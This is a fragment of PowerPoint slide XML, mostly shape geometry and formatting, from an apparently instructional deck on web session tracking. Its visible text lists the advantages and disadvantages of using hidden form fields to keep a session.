                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE9B8CB0-045C-7945-BAE6-16B9ADE09A7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="785813" y="3975100"/>
            <a:ext cx="222250" cy="228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3798" name="object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06D9D1FC-08F0-E947-8851-EFA0E37F1CE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9237663" y="3943350"/>
            <a:ext cx="260350" cy="2667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3799" name="object 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{416D235C-6895-F44D-AE17-2CBDDBE01034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="890588" y="4057650"/>
            <a:ext cx="8378825" cy="152400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3840479"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 67310"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 3840479"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 67310"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 3840479"/>
              <a:gd name="T5" fmla="*/ 0 h 67310"/>
              <a:gd name="T6" fmla="*/ 0 w 3840479"/>
              <a:gd name="T7" fmla="*/ 0 h 67310"/>
              <a:gd name="T8" fmla="*/ 0 w 3840479"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 67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0479" h="67310">
                <a:moveTo>
                  <a:pt x="0" y="67055"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3840479" y="67055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3840479" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6705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00" name="object 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD4DBFEB-1ED0-6144-9792-6CF9EC5D3525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9375775" y="2054225"/>
            <a:ext cx="122238" cy="2317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3801" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AE6626B-0942-5649-A85B-3E41AB5DBE89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9375775" y="2166938"/>
            <a:ext cx="122238" cy="1816100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 55245"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 807719"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 55245"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 807719"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 55245"/>
              <a:gd name="T5" fmla="*/ 0 h 807719"/>
              <a:gd name="T6" fmla="*/ 0 w 55245"/>
              <a:gd name="T7" fmla="*/ 0 h 807719"/>
              <a:gd name="T8" fmla="*/ 0 w 55245"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 8077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245" h="807719">
                <a:moveTo>
                  <a:pt x="0" y="807719"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="54863" y="807719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54863" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="80771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02" name="object 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2661B8BB-1C5D-5F48-A86B-317FBA3FDE65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="674688" y="2474913"/>
            <a:ext cx="8704262" cy="1617662"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T1" fmla="*/ 0 h 720725"/>
              <a:gd name="T2" fmla="*/ 0 w 3989704"/>
              <a:gd name="T3" fmla="*/ 0 h 720725"/>
              <a:gd name="T4" fmla="*/ 0 w 3989704"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 720725"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 720725"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 720725"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T11" fmla="*/ 2147483646 h 720725"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 720725"/>
              <a:gd name="T14" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T15" fmla="*/ 0 h 7207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89704" h="720725">
                <a:moveTo>
                  <a:pt x="3989645" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="669334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16634" y="706850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3938835" y="720138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953081" y="718094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3984205" y="692140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3989645"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03" name="object 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5550D16B-5B40-A74E-A4CF-5F119CB089A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9378950" y="2143125"/>
            <a:ext cx="0" cy="1874838"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 h 836294"/>
              <a:gd name="T1" fmla="*/ 0 h 836294"/>
              <a:gd name="T2" fmla="*/ 0 60000 65536"/>
              <a:gd name="T3" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T2">
                <a:pos x="0" y="T0"/>
              </a:cxn>
              <a:cxn ang="T3">
                <a:pos x="0" y="T1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path h="836294">
                <a:moveTo>
                  <a:pt x="0" y="836045"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="7F7F7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04" name="object 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B291675B-FAAF-4349-82E1-C82705186BC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9378950" y="2114550"/>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704"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="AFAFA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05" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D4BE82D-5CF8-E34A-A274-9B590479CFE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9378950" y="2085975"/>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691"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="CECEC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06" name="object 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79DE3911-625F-E24E-8C32-34C72D8281AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9378950" y="2057400"/>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704"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="EFEF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07" name="object 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B221150F-30AB-0248-AAA5-D216A2949600}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="674688" y="4773613"/>
            <a:ext cx="8704262" cy="446087"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T1" fmla="*/ 0 h 198755"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T3" fmla="*/ 833815150 h 198755"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 198755"/>
              <a:gd name="T6" fmla="*/ 0 w 3989704"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 198755"/>
              <a:gd name="T8" fmla="*/ 0 w 3989704"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 198755"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T11" fmla="*/ 2147483646 h 198755"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 198755"/>
              <a:gd name="T14" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 198755"/>
              <a:gd name="T16" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T17" fmla="*/ 0 h 1987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89704" h="198755">
                <a:moveTo>
                  <a:pt x="3938835" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="41297" y="897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7785" y="23858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="50804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="198369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3989645" y="198369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3988747" y="41293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3965784" y="7784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="393883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08" name="object 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F532CC26-7375-D249-9AA4-CD30DF738FDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="671513" y="5187950"/>
            <a:ext cx="8712200" cy="117475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3992879"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 52069"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 3992879"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 52069"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 3992879"/>
              <a:gd name="T5" fmla="*/ 0 h 52069"/>
              <a:gd name="T6" fmla="*/ 0 w 3992879"/>
              <a:gd name="T7" fmla="*/ 0 h 52069"/>
              <a:gd name="T8" fmla="*/ 0 w 3992879"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 520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92879" h="52069">
                <a:moveTo>
                  <a:pt x="0" y="51815"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3992879" y="51815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3992879" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="518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09" name="object 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A64339C-CD9D-1645-AACD-A7CB132183B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="785813" y="5608638"/>
            <a:ext cx="222250" cy="2270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3810" name="object 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEC36452-973F-6140-83CB-35679E74AFF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9237663" y="5580063"/>
            <a:ext cx="260350" cy="2603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3811" name="object 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ADFB2A7-91BC-8640-BB14-2DD42A966A9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="890588" y="5686425"/>
            <a:ext cx="8378825" cy="153988"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3840479"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 67310"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 3840479"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 67310"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 3840479"/>
              <a:gd name="T5" fmla="*/ 0 h 67310"/>
              <a:gd name="T6" fmla="*/ 0 w 3840479"/>
              <a:gd name="T7" fmla="*/ 0 h 67310"/>
              <a:gd name="T8" fmla="*/ 0 w 3840479"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 673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0479" h="67310">
                <a:moveTo>
                  <a:pt x="0" y="67055"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3840479" y="67055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3840479" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6705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12" name="object 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9806EAB0-6508-6D43-90D9-CD19D9ED0C68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9375775" y="4867275"/>
            <a:ext cx="122238" cy="2381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3813" name="object 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEC2A8AA-3F50-4548-9E57-DB33925BBA55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9375775" y="4984750"/>
            <a:ext cx="122238" cy="627063"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 55245"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 280669"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 55245"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 280669"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 55245"/>
              <a:gd name="T5" fmla="*/ 0 h 280669"/>
              <a:gd name="T6" fmla="*/ 0 w 55245"/>
              <a:gd name="T7" fmla="*/ 0 h 280669"/>
              <a:gd name="T8" fmla="*/ 0 w 55245"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 2806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245" h="280669">
                <a:moveTo>
                  <a:pt x="0" y="280415"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="54863" y="280415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54863" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2804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14" name="object 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{639502E5-22B5-FA49-9049-67E832281311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="674688" y="5291138"/>
            <a:ext cx="8704262" cy="431800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T1" fmla="*/ 0 h 193039"/>
              <a:gd name="T2" fmla="*/ 0 w 3989704"/>
              <a:gd name="T3" fmla="*/ 0 h 193039"/>
              <a:gd name="T4" fmla="*/ 0 w 3989704"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 193039"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 193039"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 193039"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T11" fmla="*/ 2147483646 h 193039"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 193039"/>
              <a:gd name="T14" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T15" fmla="*/ 0 h 1930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89704" h="193039">
                <a:moveTo>
                  <a:pt x="3989645" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="142076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16634" y="179591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3938835" y="192880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953081" y="190836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3984205" y="164882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3989645"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3815" name="object 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D09FB9F6-67AC-4B41-B0EB-B41BE6532428}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9378950" y="4959350"/>
            <a:ext cx="0" cy="692150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 h 309244"/>
              <a:gd name="T1" fmla="*/ 0 h 309244"/>
              <a:gd name="T2" fmla="*/ 0 60000 65536"/>
              <a:gd name="T3" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T2">
                <a:pos x="0" y="T0"/>
              </a:cxn>
              <a:cxn ang="T3">
                <a:pos x="0" y="T1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path h="309244">
                <a:moveTo>
                  <a:pt x="0" y="308786"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="7F7F7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16" name="object 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6491D61-C1A3-944B-8B04-64308ABD5FC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9378950" y="4930775"/>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704"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="AFAFA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17" name="object 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B474781C-DBFB-9A48-8CF2-99AFFA662014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9378950" y="4902200"/>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704"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="CECEC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18" name="object 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DAEF69A-C325-944E-A09F-5702E0795307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9378950" y="4873625"/>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691"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="EFEF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819" name="object 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5E3BA93-D770-6445-AB90-B8E88C564A71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="758825" y="1985963"/>
            <a:ext cx="8526463"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700">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Disadvantage of this approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>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it requires careful and tedious programming effort, as all the pages have to be dynamically generated to include this hidden field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="713"/>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session ends as soon as the browser is closed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="88"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Advantage of this approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="663"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>All browser supports HTML forms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27A6D80-A6FE-5544-9185-0CD8D4529769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
